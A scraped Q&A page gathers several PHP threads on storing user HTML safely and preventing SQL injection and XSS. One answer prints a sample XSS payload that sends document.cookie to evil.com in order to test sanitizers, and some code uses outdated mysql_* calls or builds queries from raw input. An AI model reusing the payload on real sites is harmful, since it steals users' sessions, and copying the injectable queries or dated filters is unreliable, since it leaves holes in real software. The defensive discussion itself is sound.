Saving HTML in database - htmlentities [duplicate] - php

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Best way to prevent SQL Injection in PHP
On my site I have some HTML contents that a user sometimes must save in database. What is the safe way to do this (I don't want my database to be in danger, or users who will see that code later, called from database).
So what I have read is:
Use htmlentities to save data in database, and html_entity_decode to decode data from database. Is this safe enough, or should I use something else?

Provided you're using string escaping and/or prepared statements, HTML markup can't cause any damage to your database. The danger with HTML markup comes when you display it to the user, as if someone has injected unsavory HTML into the markup you're going to display then you've got an XSS attack on your hands.
If you're not escaping or using prepared statements, then pretty much any data that comes from outside can be dangerous.

You might want to look at the PHP function mysql_real_escape_string() ... More in this post: strip_tags enough to remove HTML from string?
Here's an example ...
// scrub string ... call with sanitize($blah,1) to allow HTML
function sanitize( $val, $html=0 ) {
if (is_array($val)) {
foreach ($val as $k=>$v) $val[$k] = sanitize($v, $html);
return $val;
} else {
$val = trim( $val );
if (!$html) {
$val = strip_tags($val);
$pat = array("\r\n", "\n\r", "\n", "\r");
$val = str_replace($pat, '<br>', $val); // newlines to <br>
$pat = array('/^\s+/', '/\s{2,}/', '/\s+\$/');
$rep = array('', ' ', '');
$val = preg_replace($pat, $rep, $val); // remove multiple whitespaces
}
return mysql_real_escape_string($val); // escape stuff
}
}

Related

What kind of security loopholes could this creative way of sanitizing input, possibly face? (if any)

The standard way of sanitizing input would be to use commands such as
$url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%#$\|*\'()\\x80-\\xff]|i', '', $url);
$strip = array('%0d', '%0a', '%0D', '%0A');
preg_replace("/[^A-Za-z0-9 ]/", '', $string);
echo htmlentities($str);
However, I like it when my users are able to use nice things like parentheses, carats, quotes, etc in their inputs, comments/usernames/etcetc. Since HTML renders codes such as ( into symbols such as (, I was hoping to use this alternative approach to sanitizing their input.
Before I embarked on writing a function to do this for possibly harmful characters such as ( or ; or < (so injections such as sneaky eval() or <text/javascript> would not work) I tried searching up previous people's attempts at doing this type of sanitization.
I found none.
This makes me think that I must be clearly overlooking some incredibly obvious security flaw in my "creative" sanitization method.
I will not be using this function as the primary way to protect my mySQL database. I have the new mysqli class for that. Adding this sanitization overtop of the mysqli separation of input & query seems like a nice idea, though.
I am using a completely different function to clean up URLs. Those require a different approach.
This function will be used for user input to be displayed on the page, though.
So .... what could I possibly be missing? I KNOW there's gotta be something wrong with this idea since no one else uses it, right?! Is it possible to "re-render the rendered text" or something else horrific and obvious? My pretty little function so far:
Takes input strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
function santitize_data($data) {
//explode the string
//do a replacement for each character separately. Only do one replacement.
//dont do it with preg_replace because that function searches through a string in multiple passes
//and replaces already-replaced characters, resulting in horrific mishmash.
//put it back together with + signs iterating through array variables
$patterns = array();
$patterns[0] = "'";
$patterns[1] = '"';
$patterns[2] = '!';
$patterns[3] = '\\';
$patterns[4] = '#';
$patterns[5] = '%';
$patterns[6] = '&';
$patterns[7] = '$';
$patterns[8] = '(';
$patterns[9] = ')';
$patterns[10] = '/';
$patterns[11] = ':';
$patterns[12] = ';';
$patterns[13] = '|';
$patterns[14] = '<';
$patterns[15] = '>';
$patterns[16] = '{';
$patterns[17] = '}';
$replacements = array();
$replacements[0] = ''';
$replacements[1] = '"';
$replacements[2] = '&#33';
$replacements[3] = '\';
$replacements[4] = '#';
$replacements[5] = '%';
$replacements[6] = '&';
$replacements[7] = '$';
$replacements[8] = '(';
$replacements[9] = ')';
$replacements[10] = '/';
$replacements[11] = ':';
$replacements[12] = ';';
$replacements[13] = '|';
$replacements[14] = '<';
$replacements[15] = '>';
$replacements[16] = '{';
$replacements[17] = '}';
$split_data = str_split($data);
foreach ($split_data as &$value) {
for ($i=0; $i<17; $i++){
//testing
//echo '<br> i='.$i.' value='.$value.' patterns[i]='.$patterns[$i].' replacements[i]='.$replacements[$i].'<br>';
if ($value == $patterns[$i]) {
$value = $replacements[$i];
$i=17; } } }
unset($value); // break the reference with the last element
$data = implode($split_data);
//a bit of commented out code .. was using what seemed more logical before ... preg_replace .. but it parses the string in multiple passes ):
//$data = preg_replace($patterns, $replacements, $data);
return $data;
} //---END function definition of santitize_data
Spits out result strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
and the user sees these things rendered in the browser like like meep';) drop table and
alert(eval('document.body.inne' + 'rHTML'));
Without analyzing your code I can tell you that there is a high probability that you've overlooked something that an attacker could use to inject their own code.
The main threat here is XSS - you shouldn't need to "sanitize" to insert data into a database. You either use parameterised queries or you correctly encode characters that the database query language confers special meaning to at the point of entry into your database (e.g. ' character). XSS is normally dealt with by encoding at the point of output, however if you want to allow rich text then you need to take a different approach which is what I believe you are looking to achieve here.
Remember there is no magic function that sanitizes input in a generic manner - it very much depends on how and where it is used to determine whether it is safe or not in that context. (This bit added so if anyone searches and finds this answer then they are up to speed - I think you're already on top of this though.)
Complexity is the main enemy of security. If you cannot determine whether your code is safe or not it is too complicated and a sufficiently motivated attacker with enough time will find a way round your sanitization methods.
What can you do about this?
If you want to allow your users to enter rich text you could either allow BBCode to allow users to insert a limited, safe subset of HTML via your own conversion functions or you could allow HTML entry and run the content through a tried and tested solution such as HTML Purifier. Now, HTML Purifier won't be perfect and I'm sure that (another) flaw will be found in it at some point in the future.
How to guard against this?
If you implement a Content Security Policy on your site, this will prevent any successfully injected script code from executing in the browser. See here for current browser support for CSP. Don't be tempted to just use one of these methods - a good security model has layered security so if one control is circumvented, the other can catch it.
Google have now implemented CSP in Gmail to ensure any HTML email received cannot try anything sneaky to launch an XSS attack.

Sanitizing Output To Textarea From XSS

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution
Reason
Imagine an impute like this
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If i use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
if i use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '<script>document.write("<img src='http://evil.com/?cookies='"+document.cookie+"' style='display:none;' />");</script> I love PHP' (length=166)
My Choice
function cleanData($str) {
$str = urldecode ($str );
$str = filter_var($str, FILTER_SANITIZE_STRING);
$str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
return $str ;
}
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(&#34;&#34;); I love PHP' (length=46)
If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless
The are also enough class online to help you do filter see
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input.It now also covers multi-line textarea input
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{ if($text == ""){return "";}
$text = nl2br($text,false); // false gives <br>, true gives <br />
$textary = explode("<br>",$text);
foreach($textary as $key => $val)
{ $val = trim($val);
$val = stripslashes($val);
$val = htmlspecialchars($val);
$textary[$key] = $val;
}
if ($html)
{ return implode("<br />",$textary);} //return implode("<br>",$textary);
else
{ return implode("\r\n",$textary);}
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php

Is this enough for a secure site? (4 small functions) [duplicate]

This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
PHP: the ultimate clean/secure function
I revised my site's security filters today. I used to filter input and do nothing with the output.
Here it is:
All user inputted variables go through these 2 functions depending on the type:
PS: Since I didn't start coding from scratch I did it for all variables, including the ones that aren't aren't used in queries. I understand that this is a performance killer and will be undoing that. Better safe than sorry right?
// numbers (I expect very large numbers)
function intfix($i)
{
$i = preg_replace('/[^\d]/', '', $i);
if (!strlen($i))
$i = 0;
return $i;
}
// escape non-numbers
function textfix($value) {
$value = mysql_real_escape_string($value);
return $value;
}
XSS preventing:
Input - filters user submitted text, like posts and messages. As you see it's currently empty. Not sure if strip_tags is needed.
Output - on all html outputs
function input($input){
//$input = strip_tags($input, "");
return $input;
}
function output($bbcode){
$bbcode = textWrap($bbcode); // textwrap breaks long words
$bbcode = htmlentities($bbcode,ENT_QUOTES,"UTF-8");
$bbcode = str_replace("\n", "<br />", $bbcode);
// then some bbcode (removed) and the img tag
$urlmatch = "([a-zA-Z]+[:\/\/]+[A-Za-z0-9\-_]+\\.+[A-Za-z0-9\.\/%&=\?\-_]+)";
$match["img"] = "/\[img\]".$urlmatch."\[\/img\]/is";
$replace["img"] = "<center><img src=\"$1\" class=\"max\" /></center>";
return $bbcode;
}
I included the img tag because it could be vulnerable to css...
What do you think? Anything obviously wrong? Good enough?
Looks ok, but you could easily make one function for both texts and ints, checking first its type, and act on it.

Instert html/text to mysql

I am using TinyMCE to allow users to edit the content of certain pages, the problem is that I should store html tags, along with class="" -es and ..etc.
How should I defend the application against SQL injection, and store the html tags? (main problem is the " -s, It is messing up the mysql query)
In nutshell, I don't know how to add the $_POST (which is a text) to the insert_to_content() function.
$html = "";
$url = "";if (isset($_GET["page"])) {$url = safesql($_GET["page"]);}
$sqlSelectPageText = mysql_query('SELECT * FROM content WHERE name="'.$url.'" LIMIT 1');
$pageText = mysql_fetch_array($sqlSelectPageText); /**/ $sqlSelectPageText = "";
if (isset($_GET["edit"]) and isset($_POST["text"])) {
insert_to_content($url,I_SHOULD_DO_SOMTHG_WAAA($_POST["text"]));
header('Location: admin.php?page='.$url);
}
$html .= '<div id="editor1div">';
$html .= '<form action="admin.php?page='.$url.'&edit" method="post">';
$html .= ' <input class="formsSubmit" type="image" src="images/yep2.png" alt="Save" />';
$html .= '<p>Content:</p>';
$html .= ' <textarea id="editor1" name="text">';
$html .= ' '.$pageText["text"]; /**/$pageText = "";
$html .= ' </textarea>';
$html .= '</form>';
$html .= '</div>';
echo $html;
function insert_to_content($whatPage, $text) {
if (mysql_query('UPDATE content SET text="'.$text.'", lastdate=NOW() WHERE name="'.$whatPage.'"')) {
return true;
} else {
return false;
}
}
function I_SHOULD_DO_SOMTHG_WAAA($text) {
//what should i do with it?
}
EDIT:
#CaNNaDaRk:
I am trying to use your work, but never used PDO (or OOP PHP) so. So, is it possible that I don't have this function? :D "Class 'PDO' not found in.." `
$db = new PDO("mysql:host=$sqlHost;dbname=$sqlDb;$sqlUser,$sqlPass");
$stmt = $db->prepare('UPDATE content SET text=:text, lastdate=NOW() WHERE name=:name');
$stmt->execute( array(':text' => $html, ':name' => $whatPage ) );
Its not only the tinyMCE text but rather your whole script that may lead to SQL injections. Either use mysql_real_escape_string for every parameter you insert into your query or think of using prepared statements such as PDO.
Use of prepared statements can prevent injection and help you with the " issue.
A little example based on your code:
$stmt = $db->prepare('UPDATE content SET text=:text, lastdate=NOW() WHERE name=:name');
$stmt->execute( array(':text' => $html, ':name' => $whatPage ) );
Execute method also returns bool so you don't have to change your code much.
use mysql_real_escape_string() as suggested
when displaying content, use htmlspecialchars() when adding content into the textarea to prevent XSS.
You basically need different quoting for html/sql target formats. There is nothing like "universal quoting". When quoting, you always quote text for some particular output, like:
string value for mysql query
like expression for mysql query
html code
json
mysql regular expression
php regular expression
For each case, you need different quoting, because each usage is present within different syntax context. This also implies that the quoting shouldn't be made at the input into PHP, but at the particular output! Which is the reason why features like magic_quotes_gpc are broken (never forget to handle it, or better, assure it is switched off!!!).
So, what methods would one use for quoting in these particular cases? (Feel free to correct me, there might be more modern methods, but these are working for me)
mysql_real_escape_string($str)
mysql_real_escape_string(addcslashes($str, "%_"))
htmlspecialchars($str)
json_encode() - only for utf8! I use my function for iso-8859-2
mysql_real_escape_string(addcslashes($str, '^.[]$()|*+?{}')) - you cannot use preg_quote in this case because backslash would be escaped two times!
preg_quote()

Replacing words with tag links in PHP

I have a text ($text) and an array of words ($tags). These words in the text should be replaced with links to other pages so they don't break the existing links in the text. In CakePHP there is a method in TextHelper for doing this but it is corrupted and it breaks the existing HTML links in the text. The method suppose to work like this:
$text=Text->highlight($text,$tags,'\1',1);
Below there is existing code in CakePHP TextHelper:
function highlight($text, $phrase, $highlighter = '<span class="highlight">\1</span>', $considerHtml = false) {
if (empty($phrase)) {
return $text;
}
if (is_array($phrase)) {
$replace = array();
$with = array();
foreach ($phrase as $key => $value) {
$key = $value;
$value = $highlighter;
$key = '(' . $key . ')';
if ($considerHtml) {
$key = '(?![^<]+>)' . $key . '(?![^<]+>)';
}
$replace[] = '|' . $key . '|ix';
$with[] = empty($value) ? $highlighter : $value;
}
return preg_replace($replace, $with, $text);
} else {
$phrase = '(' . $phrase . ')';
if ($considerHtml) {
$phrase = '(?![^<]+>)' . $phrase . '(?![^<]+>)';
}
return preg_replace('|'.$phrase.'|i', $highlighter, $text);
}
}
You can see (and run) this algorithm here:
http://www.exorithm.com/algorithm/view/highlight
It can be made a little better and simpler with a few changes, but it still isn't perfect. Though less efficient, I'd recommend one of Ben Doom's solutions.
Replacing text in HTML is fundamentally different than replacing plain text. To determine whether text is part of an HTML tag requires you to find all the tags in order not to consider them. Regex is not really the tool for this.
I would attempt one of the following solutions:
Find the positions of all the words. Working from last to first, determine if each is part of a tag. If not, add the anchor.
Split the string into blocks. Each block is either a tag or plain text. Run your replacement(s) on the plain text blocks, and re-assemble.
I think the first one is probably a bit more efficient, but more prone to programmer error, so I'll leave it up to you.
If you want to know why I'm not approaching this problem directly, look at all the questions on the site about regex and HTML, and how regex is not a parser.
This code works just fine. What you may need to do is check the CSS for the <span class="highlight"> and make sure it is set to some color that will allow you to distinguish that it is high lighted.
.highlight { background-color: #FFE900; }
Amorphous - I noticed Gert edited your post. Are the two code fragments exactly as you posted them?
So even though the original code was designed for highlighting, I understand you're trying to repurpose it for generating links - it should, and does work fine for that (tested as posted).
HOWEVER escaping in the first code fragment could be an issue.
$text=Text->highlight($text,$tags,'\1',1);
Works fine... but if you use speach marks rather than quote marks the backslashes disappear as escape marks - you need to escape them. If you don't you get %01 links.
The correct way with speach marks is:
$text=Text->highlight($text,$tags,"\\1",1);
(Notice the use of \1 instead of \1)

Categories